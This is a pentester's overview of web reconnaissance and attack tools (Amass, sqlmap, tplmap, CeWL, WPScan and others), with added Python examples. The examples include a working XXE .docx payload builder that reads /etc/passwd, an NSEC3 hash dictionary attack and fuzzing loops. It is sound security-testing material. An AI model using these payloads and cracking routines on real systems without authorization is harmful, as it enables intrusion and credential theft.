Web tools, or where should a pentester start?

We continue our series on useful tools for pentesters. In this article we look at tools for analyzing the security of web applications.

Our colleague BeLove already put together a similar selection about seven years ago. It is interesting to see which tools have kept and strengthened their positions, and which have faded into the background and are now rarely used.

Note that Burp Suite belongs here too, but it and its useful plugins will get a separate publication.

Amass is a Go tool for enumerating DNS subdomains and mapping an organization's external network. It is an OWASP project created to show what an organization looks like on the Internet from an outsider's point of view. Amass collects subdomain names in several ways: it combines recursive brute-force enumeration with searches of open sources.

Amass uses the IP addresses it finds along the way to identify the associated network blocks and autonomous system numbers, and all of this information is assembled into a network map.

Pros:
  • Information-gathering techniques include:
    * DNS: dictionary-based subdomain enumeration, subdomain brute force, "smart" enumeration using mutations of the subdomains already found, reverse DNS lookups, and a search for DNS servers that allow zone transfers (AXFR);
    * Open-source search: Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo;
    * TLS certificate databases: Censys, CertDB, CertSpotter, Crtsh, Entrust;
    * APIs of search engines and other services: BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan;
    * Web archives: ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback;
  • Integration with Maltego;
  • Provides the most complete coverage for the task of finding DNS subdomains.


Cons:
  • Be careful with amass.netdomains: it will try to reach every IP address in the discovered infrastructure and obtain domain names from reverse DNS lookups and TLS certificates. This is a "loud" technique and can expose your reconnaissance to the organization under study;
  • High memory consumption: depending on the settings it can use up to 2 GB of RAM, which rules out running it in the cloud on a cheap VDS.



Altdns is a Python tool for building dictionaries for DNS subdomain brute force. It generates many candidate subdomains by mutation and permutation: words that often occur in subdomain names (for example test, dev, staging) are combined in every way with the subdomains already known, which are given to Altdns as input. The output is a list of subdomain variants that may exist, and that list can then be fed to a DNS brute-forcer.

Pros:
  • Works well with large data sets.
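As an added illustration of the mutation-and-permutation approach described above (example code written for this page, not Altdns' own), the following Python script takes a list of already known subdomains and a short word list, both constructed here as sample input, and emits the candidate names that a DNS brute-forcer would then try. Names that are already known are dropped, since they are resolved and need no further brute force:

```python
"""Altdns-style candidate generation for DNS subdomain brute force.

Added example, not Altdns' own code. The known subdomains and the word
list below are constructed sample input.
"""

# Constructed input: subdomains already discovered for a target, and a
# short list of words that frequently appear in subdomain labels.
KNOWN_SUBDOMAINS = ["api.example.com", "staging.api.example.com"]
WORDS = ["dev", "test", "staging"]


def split_host(host: str, base_domain: str):
    """Return the labels of `host` with the base domain stripped off."""
    if host == base_domain:
        return []
    if not host.endswith("." + base_domain):
        raise ValueError(f"{host} is not under {base_domain}")
    return host[: -len(base_domain) - 1].split(".")


def mutate(labels, words):
    """Yield label lists derived from `labels`, one mutation at a time.

    The mutations mirror the ones Altdns applies: insert a word as a new
    label at every position, prefix or suffix a word to an existing
    label, and join a word to an existing label with '-'.
    """
    for i in range(len(labels) + 1):
        for w in words:
            yield labels[:i] + [w] + labels[i:]
    for i, label in enumerate(labels):
        for w in words:
            yield labels[:i] + [w + label] + labels[i + 1:]
            yield labels[:i] + [label + w] + labels[i + 1:]
            yield labels[:i] + [w + "-" + label] + labels[i + 1:]
            yield labels[:i] + [label + "-" + w] + labels[i + 1:]


def generate_candidates(known, words, base_domain):
    """Return a sorted, de-duplicated list of candidate hostnames.

    Anything already in `known` is removed: those names are resolved,
    so there is no point brute-forcing them again.
    """
    candidates = set()
    for host in known:
        labels = split_host(host, base_domain)
        for new_labels in mutate(labels, words):
            candidates.add(".".join(new_labels + [base_domain]))
    return sorted(candidates - set(known))


if __name__ == "__main__":
    for name in generate_candidates(KNOWN_SUBDOMAINS, WORDS, "example.com"):
        print(name)
```

Pipe the output into MassDNS or Amass's brute-force mode; the list grows roughly as (known names) × (words) × (positions), so trim the word list before feeding a large known set.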


aquatone was previously better known as another subdomain discovery tool, but its author abandoned that direction in favor of the aforementioned Amass. aquatone has since been rewritten in Go and is now geared towards preliminary reconnaissance of websites: it takes the specified domains, looks for web services on various ports, collects information about each site and takes a screenshot. Convenient for a quick first look at websites, after which you can pick priority targets for attack.

Pros:
  • Produces a set of files and folders that are convenient for further work with other tools:
    * an HTML report with the collected screenshots and response headers, grouped by similarity;
    * a file with all the URLs on which websites were found;
    * a file with statistics and page data;
    * a folder with the response headers from the found targets;
    * a folder with the response bodies from the found targets;
    * screenshots of the found websites;
  • Accepts XML reports from Nmap and Masscan as input;
  • Uses headless Chrome/Chromium to render screenshots.


Cons:
  • It may attract the attention of intrusion detection systems, so its settings need tuning.

[Screenshot: aquatone v0.5.0, one of the old versions in which DNS subdomain discovery was still implemented. Older versions can be found on the project's releases page.]


MassDNS is another tool for finding DNS subdomains. Its main distinguishing feature is that it sends DNS queries directly to many different resolvers and does so at considerable speed.

Pros:
  • Fast - able to resolve more than 350 thousand names per second.


Cons:
  • MassDNS can put a significant load on the resolvers it uses, which may get those servers banned or result in complaints to your provider. It will also put a heavy load on the company's own DNS servers, if it has them and they are authoritative for the domains you are resolving;
  • The bundled list of resolvers is currently outdated, but if you weed out the dead ones and add new known resolvers, everything works fine.



nsec3map is a Python tool for obtaining a complete list of the names in DNSSEC-signed zones, which it does by walking the zone's NSEC or NSEC3 chain.

Pros:
  • Quickly discovers hosts in DNS zones with a minimal number of queries when DNSSEC is enabled for the zone;
  • Comes with a plugin for John the Ripper that can be used to crack the collected NSEC3 hashes.


Cons:
  • Many DNS errors are handled incorrectly;
  • No automatic parallelization when processing NSEC records: you have to split the namespace by hand;
  • High memory consumption.
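To show what the NSEC3 hashes gathered by a chain walk actually are, and why a John the Ripper plugin is needed to turn them back into names, here is an added Python example (written for this page, not nsec3map's code) that computes NSEC3 owner-name hashes per RFC 5155 and runs a dictionary attack over a constructed set of hashes. The zone name, salt and iteration count are those of the RFC 5155 Appendix A example zone, so the apex hash can be checked against the RFC; the "collected" hashes and the candidate labels are constructed here.

```python
"""NSEC3 owner-name hashing (RFC 5155) and an offline dictionary attack on
the hashes, as collected when walking an NSEC3 chain with nsec3map.

Added example, not nsec3map's code. The "collected" hashes and the
candidate label list are constructed.
"""
import base64
import hashlib

# base32hex (RFC 4648 section 7) differs from standard base32 only in the
# alphabet, so translate the output of the standard encoder.
_B32_STD = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
_B32_HEX = b"0123456789ABCDEFGHIJKLMNOPQRSTUV"
_TO_B32HEX = bytes.maketrans(_B32_STD, _B32_HEX)


def wire_name(name: str) -> bytes:
    """Encode a domain name in canonical (lower-case) DNS wire format."""
    out = b""
    for label in name.rstrip(".").lower().split("."):
        if label:
            out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def nsec3_hash(name: str, salt_hex: str, iterations: int) -> str:
    """Return the base32hex NSEC3 hash of `name` (hash algorithm 1 = SHA-1).

    RFC 5155 section 5: IH(x, 0) = H(x || salt) and
    IH(x, k) = H(IH(x, k-1) || salt), so SHA-1 runs iterations + 1 times.
    """
    salt = bytes.fromhex(salt_hex)
    digest = hashlib.sha1(wire_name(name) + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    # 20 bytes encode to exactly 32 base32 characters, so no '=' padding.
    return base64.b32encode(digest).translate(_TO_B32HEX).decode().lower()


def crack_nsec3(hashes, zone, candidates, salt_hex, iterations):
    """Map hashed owner names back to names by trying each candidate label.

    An empty label stands for the zone apex. This is what the John the
    Ripper nsec3 plugin does at scale: NSEC3 hides names only as well as
    the salt, the iteration count and your word list allow.
    """
    wanted = set(hashes)
    found = {}
    for label in candidates:
        fqdn = zone if label == "" else f"{label}.{zone}"
        h = nsec3_hash(fqdn, salt_hex, iterations)
        if h in wanted:
            found[h] = fqdn
    return found


if __name__ == "__main__":
    ZONE, SALT, ITER = "example", "aabbccdd", 12
    # Constructed: hashes "collected" from the chain of a zone that uses
    # the NSEC3 parameters above, plus a small label dictionary.
    collected = [nsec3_hash("ns1.example", SALT, ITER),
                 nsec3_hash("www.example", SALT, ITER)]
    for h, name in crack_nsec3(collected, ZONE, ["", "mail", "ns1", "www"], SALT, ITER).items():
        print(h, "->", name)
```

The salt and iteration count come from the zone's NSEC3PARAM record, so a walk always yields everything needed for the offline attack; only the word list limits what is recovered.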


Acunetix is a web vulnerability scanner that automates web application security checks. It tests the application for SQL injection, XSS, XXE, SSRF and many other web vulnerabilities. However, like any other general-purpose web vulnerability scanner, it does not replace a pentester, since it cannot find complex vulnerability chains or logic flaws. But it covers a great many vulnerabilities, including various CVEs that a pentester might have forgotten about, so it is very convenient for getting rid of routine checks.

Pros:
  • Low level of false positives;
  • Results can be exported as reports;
  • Performs a large number of checks for different vulnerabilities;
  • Parallel scanning of multiple hosts.


Cons:
  • There is no de-duplication algorithm (Acunetix treats pages with identical functionality as different because different URLs lead to them), but the developers are working on it;
  • Requires installation on a separate web server, which makes it harder to test client systems over a VPN connection or to use the scanner inside an isolated segment of the client's local network;
  • It can be "noisy" towards the service under test, for example by sending too many attack vectors to the site's contact form and thereby seriously disrupting business processes;
  • It is a proprietary and therefore non-free solution.



Dirsearch is a Python tool for brute-forcing directories and files on websites.

Pros:
  • It can distinguish real "200 OK" pages from "200 OK" pages that actually carry a "page not found" text;
  • Comes with a handy dictionary that strikes a good balance between size and search efficiency, and includes standard paths typical of many CMSs and technology stacks;
  • Its own dictionary format gives good efficiency and flexibility when searching for files and directories;
  • Convenient output: plain text, JSON;
  • Can throttle, i.e. pause between requests, which is vital for any fragile service.


Cons:
  • Extensions must be passed as a single string, which is inconvenient when you need to pass many extensions at once;
  • To use your own dictionary, you will need to adapt it slightly to the Dirsearch dictionary format for maximum efficiency.



wfuzz is a Python web application fuzzer, probably one of the best-known. The principle is simple: wfuzz lets you fuzz any position in an HTTP request, which makes it possible to fuzz GET/POST parameters and HTTP headers, including Cookie and other authentication headers. At the same time it is convenient for plain brute force of directories and files, for which you need a good dictionary. It also has a flexible filter system that lets you filter the website's responses by various criteria, which helps get effective results.

Pros:
  • Multifunctional: modular structure, and a build takes only a few minutes;
  • Convenient filtering and fuzzing mechanism;
  • You can fuzz any HTTP method, as well as any position in the HTTP request.


Cons:
  • Still under development.



ffuf is a Go web fuzzer built along the same lines as wfuzz; it brute-forces files, directories, URL paths, names and values of GET/POST parameters and HTTP headers, including the Host header for virtual host discovery. ffuf differs from its counterpart in higher speed and some new features, for example support for dictionaries in Dirsearch format.

Pros:
  • Filters similar to wfuzz's, allowing flexible configuration of the brute force;
  • Allows fuzzing HTTP header values, POST data and various parts of the URL, including GET parameter names and values;
  • You can specify any HTTP method.


Cons:
  • Still under development.
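The filtering and response-matching logic that Dirsearch, wfuzz and ffuf share is easy to see in a small Python sketch. The following is an added example written for this page (not code from any of these projects): it substitutes each word into a request template at the FUZZ position, drops responses by status code or size the way ffuf's -fc/-fs filters do, and compares every response with a baseline fetched for a random non-existent path, so that "200 OK" pages that really say "not found" are discarded. The target site and the send function are constructed stand-ins for an HTTP client; the paths and responses are invented.

```python
"""Minimal ffuf/wfuzz-style fuzzing loop: substitute FUZZ into a request
template, send each candidate, and drop responses that match the filters
or look like the server's "not found" page.

Added example, not ffuf's or wfuzz's code. The target is a constructed
in-process fake application and `fake_send` stands in for an HTTP client.
"""
import difflib
import secrets

# Constructed fake site: path -> (status, body). Unknown paths get a
# "soft 404": HTTP 200 with a "page not found" body, as many CMSs do.
FAKE_SITE = {
    "/": (200, "<html>Welcome to the shop</html>"),
    "/admin": (403, "<html>Forbidden</html>"),
    "/backup.zip": (200, "PK\x03\x04 binary"),
    "/api": (301, ""),
}
SOFT_404 = (200, "<html>Sorry, the page you requested was not found</html>")


def fake_send(path: str):
    """Stand-in for an HTTP client; returns (status, body)."""
    return FAKE_SITE.get(path, SOFT_404)


def calibrate(send, template):
    """Fetch a random path that cannot exist to learn what 'not found' looks like."""
    return send(template.replace("FUZZ", secrets.token_hex(8)))


def is_soft_404(response, baseline, threshold=0.9):
    """A response counts as 'not found' when its status equals the baseline's
    and the body is nearly identical (length alone is too brittle)."""
    status, body = response
    b_status, b_body = baseline
    if status != b_status:
        return False
    return difflib.SequenceMatcher(None, body, b_body).ratio() >= threshold


def fuzz(send, template, wordlist, filter_codes=(404,), filter_sizes=()):
    """Return [(word, status, size)] for candidates that survive filtering.

    `filter_codes` / `filter_sizes` mirror ffuf's -fc / -fs; the baseline
    comparison mirrors its -ac auto-calibration.
    """
    baseline = calibrate(send, template)
    hits = []
    for word in wordlist:
        resp = send(template.replace("FUZZ", word))
        status, body = resp
        if status in filter_codes or len(body) in filter_sizes:
            continue
        if is_soft_404(resp, baseline):
            continue
        hits.append((word, status, len(body)))
    return hits


if __name__ == "__main__":
    WORDLIST = ["admin", "backup.zip", "api", "login", "uploads"]
    for hit in fuzz(fake_send, "/FUZZ", WORDLIST):
        print(hit)
```

The same loop works for a parameter name, a header value or a virtual host, because only the template changes; the baseline comparison is what keeps a soft-404 site from drowning the results.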



gobuster is a Go reconnaissance tool with two modes of operation: the first brute-forces files and directories on a website, the second enumerates DNS subdomains. Out of the box the tool does not support recursive enumeration of files and directories, which of course saves time, but on the other hand the brute force of each newly found endpoint has to be launched separately.

Pros:
  • High speed, both for DNS subdomain brute force and for file and directory brute force.


Cons:
  • The current version does not support setting HTTP headers;
  • By default only some HTTP status codes (200, 204, 301, 302, 307) are treated as valid.



Arjun is a tool for brute-forcing hidden HTTP parameters in GET/POST requests and in JSON bodies. Its built-in dictionary has 25,980 words, which Arjun checks in about 30 seconds. The trick is that Arjun does not check each parameter separately but sends roughly 1,000 parameters at once and looks at whether the response changed. If it did, it splits those 1,000 parameters in two and checks which half affects the response. Thus, by simple binary search, it finds the parameter (or several hidden parameters) that changed the response and therefore probably exist.

Pros:
  • High speed thanks to binary search;
  • Support for GET/POST parameters, as well as parameters in JSON form.

The Burp Suite plugin param-miner works on the same principle and is also very good at finding hidden HTTP parameters. We will say more about it in the upcoming article about Burp and its plugins.
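The group-then-bisect search that the article attributes to Arjun and param-miner, as an added Python example written for this page (not code from either tool). The endpoint and the two hidden parameter names it reacts to are constructed; in a real run `send` would wrap an HTTP request and compare normalized response bodies:

```python
"""Group-then-bisect discovery of hidden request parameters, the approach
the article attributes to Arjun and param-miner.

Added example, not Arjun's code. `fake_app` is a constructed stand-in for
the target endpoint; a real run would replace it with an HTTP request.
"""


def fake_app(params: dict) -> str:
    """Stand-in for the endpoint under test. Reacts to two undocumented
    parameters, which is the behaviour we want to discover."""
    body = "<h1>Profile</h1>"
    if "debug" in params:
        body += "<pre>debug info</pre>"
    if "admin_token" in params:
        body += "<p>invalid token</p>"
    return body


def find_hidden_params(send, wordlist, chunk_size=1000, value="x"):
    """Return (sorted names whose presence changes the response, requests made).

    Every chunk is sent in one request. A chunk whose response differs
    from the baseline is split in half and each half re-tested, so each
    reflected parameter costs O(log chunk_size) requests instead of one
    request per word.
    """
    baseline = send({})
    found = []
    stack = [wordlist[i:i + chunk_size] for i in range(0, len(wordlist), chunk_size)]
    requests_made = 1
    while stack:
        group = stack.pop()
        requests_made += 1
        if send({p: value for p in group}) == baseline:
            continue  # nothing in this group influences the response
        if len(group) == 1:
            found.append(group[0])
            continue
        mid = len(group) // 2
        stack.append(group[:mid])
        stack.append(group[mid:])
    return sorted(found), requests_made


def sample_wordlist():
    """Constructed dictionary: 2000 decoys with the two hidden names buried inside."""
    words = [f"param{i}" for i in range(2000)]
    words[500], words[1500] = "debug", "admin_token"
    return words


if __name__ == "__main__":
    words = sample_wordlist()
    names, n = find_hidden_params(fake_app, words)
    print(names, "found with", n, "requests instead of", len(words) + 1)
```

Two practical caveats the toy hides: a real comparison must first strip dynamic content (timestamps, CSRF tokens) from the baseline, and the chunk size is bounded by the server's limits on URL length and parameter count, which is why Arjun tops out around 1,000 names per request.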


LinkFinder is a Python script for finding links in JavaScript files. Useful for discovering hidden or forgotten endpoints and URLs in a web application.

Pros:
  • Fast;
  • There is a special plugin for Chrome based on LinkFinder.


Cons:
  • Inconvenient output format;
  • Does not analyze JavaScript dynamically;
  • Quite simple link-search logic: if the JavaScript is obfuscated in some way, or the links are not present literally and are generated dynamically, it will find nothing.
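An added Python example (written for this page, not LinkFinder's code) of the static extraction LinkFinder performs, and of the limitation noted above. The JavaScript sample is constructed: it contains three literal endpoints plus one path that is only assembled at run time, and the regex is a simplified pattern of the kind such tools use, not LinkFinder's own. The dynamically built path /internal/debug is missed and only the fragment /int is recovered.

```python
"""Static extraction of endpoints from JavaScript, in the spirit of LinkFinder.

Added example, not LinkFinder's code. SAMPLE_JS is constructed and the
regex is a simplified pattern, not LinkFinder's own.
"""
import re

# Constructed JavaScript: literal endpoints, a full URL, and a path that
# only exists once the code runs (concatenated at run time).
SAMPLE_JS = r'''
fetch("/api/v1/users?limit=10").then(r => r.json());
const legacy = '/admin/export.php';
axios.post("https://api.example.com/v2/login", creds);
const base = "/int" + "ernal/"; const hidden = base + "debug";  // built dynamically
'''

# One quoted string that looks like a URL or path: an absolute or
# protocol-relative URL, a root-relative path, or a bare file name with a
# web-ish extension.
ENDPOINT_RE = re.compile(r'''
    (?P<q>["'`])
    (?P<url>
        (?:https?:)?//[^"'`\s]+
      | /[A-Za-z0-9_./?=&%-]*
      | [A-Za-z0-9_-]+\.(?:php|asp|aspx|jsp|json|js|html?)(?:\?[^"'`\s]*)?
    )
    (?P=q)
''', re.VERBOSE)


def extract_endpoints(js: str):
    """Return de-duplicated endpoint strings in order of first appearance."""
    seen, out = set(), []
    for m in ENDPOINT_RE.finditer(js):
        url = m.group("url")
        # "/" and "//" are too generic to be useful as endpoints.
        if url not in seen and url not in ("/", "//"):
            seen.add(url)
            out.append(url)
    return out


if __name__ == "__main__":
    for ep in extract_endpoints(SAMPLE_JS):
        print(ep)
```

When the list looks suspiciously short for a large bundle, or contains fragments like /int, that is the cue to load the page in a browser with the developer tools open and capture the requests it actually makes.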



JSParser is a Python script that uses Tornado and JSBeautifier to extract relative URLs from JavaScript files. Very useful for detecting AJAX requests and compiling a list of the API methods the application interacts with. Works well together with LinkFinder.

Pros:
  • Quick parsing of JavaScript files.



sqlmap is probably one of the best-known tools for web application testing. It automates the discovery and exploitation of SQL injection, works with several SQL dialects, and has a huge number of techniques in its arsenal, from a straightforward single quote to complex vectors for time-based SQL injection. In addition it has many post-exploitation techniques for various DBMSs, so it is useful not only as a SQL injection scanner but also as a powerful tool for exploiting injections already found.

Pros:
  • A large number of different techniques and vectors;
  • Low number of false positives;
  • Many fine-tuning options: specific techniques, the target DBMS, tamper scripts for WAF bypass;
  • Ability to dump the retrieved data;
  • Many post-exploitation possibilities, for example, for some databases, automatic file upload/download and command execution (RCE);
  • Support for connecting directly to the database using credentials obtained during the attack;
  • Accepts a text file with a request saved from Burp as input, so you don't need to assemble all the command-line arguments by hand.


Cons:
  • Hard to customize, for example to write your own checks, because the documentation for that is poor;
  • Without the appropriate settings it runs an incomplete set of checks, which can be misleading.



NoSQLMap is a Python tool for automating the discovery and exploitation of NoSQL injection. It is convenient not only against NoSQL databases directly but also when auditing web applications that use NoSQL.

Pros:
  • Like sqlmap, it not only finds a potential vulnerability but also checks whether it can be exploited, for MongoDB and CouchDB.


Cons:
  • Does not support Redis or Cassandra; development in that direction is under way.


oxml_xxe is a tool for embedding XXE payloads into various file types that use XML in some form.

Pros:
  • It supports many common formats, such as DOCX, ODT, SVG, XML.


Cons:
  • PDF, JPEG and GIF are not fully supported;
  • Creates only one file. To get around this you can use the docem tool, which can create a large number of files with payloads in different places.

The utilities above do an excellent job of XXE testing via uploaded documents that contain XML. But don't forget that XML parsers turn up in many other places, for example XML may be used as a data format instead of JSON.

We therefore recommend the following repository, which contains a wide variety of payloads: PayloadsAllTheThings.
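To make concrete what oxml_xxe and docem do, here is an added Python example written for this page (not either tool's code). It builds a minimal OOXML package, injects a classic external-entity DOCTYPE into one XML part at a time, and produces one .docx variant per part, so the server-side parser is exercised whichever part it opens. The package skeleton is a constructed minimum rather than a real Word document, and the entity target file:///etc/passwd is the usual test value; in a real test you would point it at a file or URL that proves the read on the parsing server, and only against an upload endpoint you are authorized to test.

```python
"""Embed an XXE payload into a minimal OOXML (.docx) container, which is
what oxml_xxe does for one file and docem does for many placements.

Added example, not either tool's code. The document skeleton is a
constructed minimum, not a full Word file.
"""
import io
import zipfile

CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" '
    'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
)
DOCUMENT = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>MARKER</w:t></w:r></w:p></w:body></w:document>'
)

# Parts inside the package that an XML parser on the server will open.
PARTS = {"[Content_Types].xml": CONTENT_TYPES, "word/document.xml": DOCUMENT}


def xxe_doctype(entity: str, target: str) -> str:
    """DOCTYPE declaring an external general entity that resolves `target`."""
    return f'<!DOCTYPE x [<!ENTITY {entity} SYSTEM "{target}">]>'


def inject(xml: str, entity: str, target: str) -> str:
    """Insert the DOCTYPE after the XML declaration and reference the entity
    in content, so a parser that resolves entities actually expands it.

    The reference replaces the MARKER text node when there is one; otherwise
    it goes directly after the root element's start tag.
    """
    decl_end = xml.index("?>") + 2
    body = xml[decl_end:]
    if "MARKER" in body:
        body = body.replace("MARKER", f"&{entity};", 1)
    else:
        pos = body.index(">") + 1
        body = body[:pos] + f"&{entity};" + body[pos:]
    return xml[:decl_end] + xxe_doctype(entity, target) + body


def build_variants(target="file:///etc/passwd", entity="xxe"):
    """Return {variant_name: docx_bytes}, one package per injected part."""
    variants = {}
    for injected_part in PARTS:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            for name, xml in PARTS.items():
                zf.writestr(name, inject(xml, entity, target) if name == injected_part else xml)
        variants[injected_part.replace("/", "_")] = buf.getvalue()
    return variants


def injected_parts(docx_bytes: bytes):
    """List the package parts that carry a DOCTYPE (for verification)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        return [n for n in zf.namelist() if b"<!DOCTYPE" in zf.read(n)]


if __name__ == "__main__":
    for name, data in build_variants().items():
        with open(f"xxe_{name}.docx", "wb") as f:
            f.write(data)
        print(name, "->", injected_parts(data))
```

For a blind test, where nothing from the file is reflected, swap the SYSTEM target for a URL on a host you control and watch for the callback; the variants tell you which part the server actually parsed.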


tplmap is a Python tool that automatically detects and exploits Server-Side Template Injection (SSTI) vulnerabilities. Its options and flags resemble sqlmap's. It uses several different techniques and vectors, including blind injection, and also has techniques for code execution and for uploading and downloading arbitrary files. Its arsenal covers a dozen or so template engines, plus some techniques for finding eval()-like code injection in Python, Ruby, PHP and JavaScript. On successful exploitation it opens an interactive console.

Pros:
  • A large number of different techniques and vectors;
  • Supports many template engines;
  • Many post-exploitation techniques.


CeWL is a Ruby dictionary generator that extracts unique words from a given website, following its links to a specified depth. The resulting list of unique words can then be used for password brute force against services, for brute force of files and directories on the same site, or for attacking captured hashes with hashcat or John the Ripper. Useful for compiling a "targeted" list of candidate passwords.

Pros:
  • Easy to use.


Cons:
  • You need to be careful with the crawl depth so as not to stray onto another domain.
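An added Python example, written for this page rather than taken from CeWL, of the crawl-and-collect approach, including the depth limit and a same-host rule that keeps the crawler from wandering onto another domain. The site contents and the fetch function are constructed stand-ins for real HTTP requests; one page deliberately links off-site so the check is exercised, and one page sits two hops deep so the depth limit is visible.

```python
"""CeWL-style word-list generation: crawl a site to a fixed depth, stay on
the starting host, and collect unique words from visible page text.

Added example, not CeWL's code. SITE is a constructed in-memory site and
`fake_fetch` stands in for the HTTP client.
"""
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed site: "about" links off-site, which a careless crawler would
# follow and thereby pollute the list with another organization's words.
SITE = {
    "https://target.example/": '<html><body><h1>Acme Widgets</h1>'
        '<a href="/about">About</a> <a href="/careers.html">Careers</a>'
        '<p>Acme builds widgets in Springfield.</p></body></html>',
    "https://target.example/about": '<html><body><p>Founded by Jane Roe, CEO.</p>'
        '<a href="https://partner.example/">Partner</a></body></html>',
    "https://target.example/careers.html": '<html><body><p>Join Acme. Project Phoenix2024 hiring.</p>'
        '<a href="/deep">More</a></body></html>',
    "https://target.example/deep": '<html><body><p>Depthwordonly</p></body></html>',
    "https://partner.example/": '<html><body><p>Offsite secretword</p></body></html>',
}


def fake_fetch(url):
    """Stand-in for an HTTP GET; returns the body or None for unknown URLs."""
    return SITE.get(url)


class PageParser(HTMLParser):
    """Collect link targets and visible text; ignore script/style content."""

    def __init__(self):
        super().__init__()
        self.links, self.text, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        if tag == "a":
            for k, v in attrs:
                if k == "href" and v:
                    self.links.append(v)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9]{2,}")  # CeWL's default minimum is 3 chars


def crawl_words(start, fetch, depth=2, min_len=3):
    """Return a Counter of words found on `start` and on pages reachable
    from it within `depth` link hops, never leaving the starting host."""
    host = urlsplit(start).netloc
    queue, seen, words = [(start, 0)], {start}, Counter()
    while queue:
        url, d = queue.pop(0)
        html = fetch(url)
        if html is None:
            continue
        p = PageParser()
        p.feed(html)
        words.update(w for w in WORD_RE.findall(" ".join(p.text)) if len(w) >= min_len)
        if d >= depth:
            continue
        for href in p.links:
            nxt = urljoin(url, href)
            if urlsplit(nxt).netloc == host and nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, d + 1))
    return words


if __name__ == "__main__":
    for word, n in crawl_words("https://target.example/", fake_fetch).most_common():
        print(f"{n:3d} {word}")
```

Sorting by frequency, as the output does, matters: product names and the town the company sits in show up on every page and make the best password candidates, so they belong at the top of the list you hand to hashcat or a login brute-forcer.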


Weakpass is a service hosting many dictionaries of unique passwords. It is extremely useful for all sorts of password-cracking tasks, from simple online brute force of accounts on target services to offline cracking of hashes with hashcat or John the Ripper. It contains about 8 billion passwords of 4 to 25 characters.

Pros:
  • Contains both specialized dictionaries and dictionaries of the most common passwords, so you can pick the one that fits your needs;
  • Dictionaries are regularly updated with new passwords;
  • Dictionaries are sorted by effectiveness: you can pick one for quick online brute force, or an extensive dictionary with the latest leaks for thorough cracking;
  • There is a calculator that estimates how long brute-forcing a password would take on your hardware.


We would like to put the tools for checking CMSs in a separate group: WPScan, JoomScan and AEM hacker.


AEM hacker is a tool for detecting vulnerabilities in Adobe Experience Manager (AEM) applications.

Pros:
  • Can detect AEM applications among a list of URLs given as input;
  • Contains scripts for obtaining RCE by uploading a JSP shell or via SSRF.


JoomScan is a Perl tool that automates vulnerability detection in Joomla CMS deployments.

Pros:
  • Able to find configuration flaws and problems with the admin settings;
  • Lists Joomla versions and their known vulnerabilities, and does the same for individual components;
  • Contains more than 1000 exploits for Joomla components;
  • Outputs final reports in text and HTML formats.



WPScan is a scanner for WordPress sites; it carries vulnerability data for the WordPress core itself as well as for some plugins.

Pros:
  • Can list not only vulnerable WordPress plugins and themes but also users and TimThumb files;
  • Can run brute-force attacks against WordPress sites.


Cons:
  • Without the appropriate settings it runs an incomplete set of checks, which can be misleading.


In general, different people prefer different tools for their work: all of them are good in their own way, and what suits one person may not suit another. If you think we have unfairly passed over some good utility, write about it in the comments!
2006-2019 © « TM »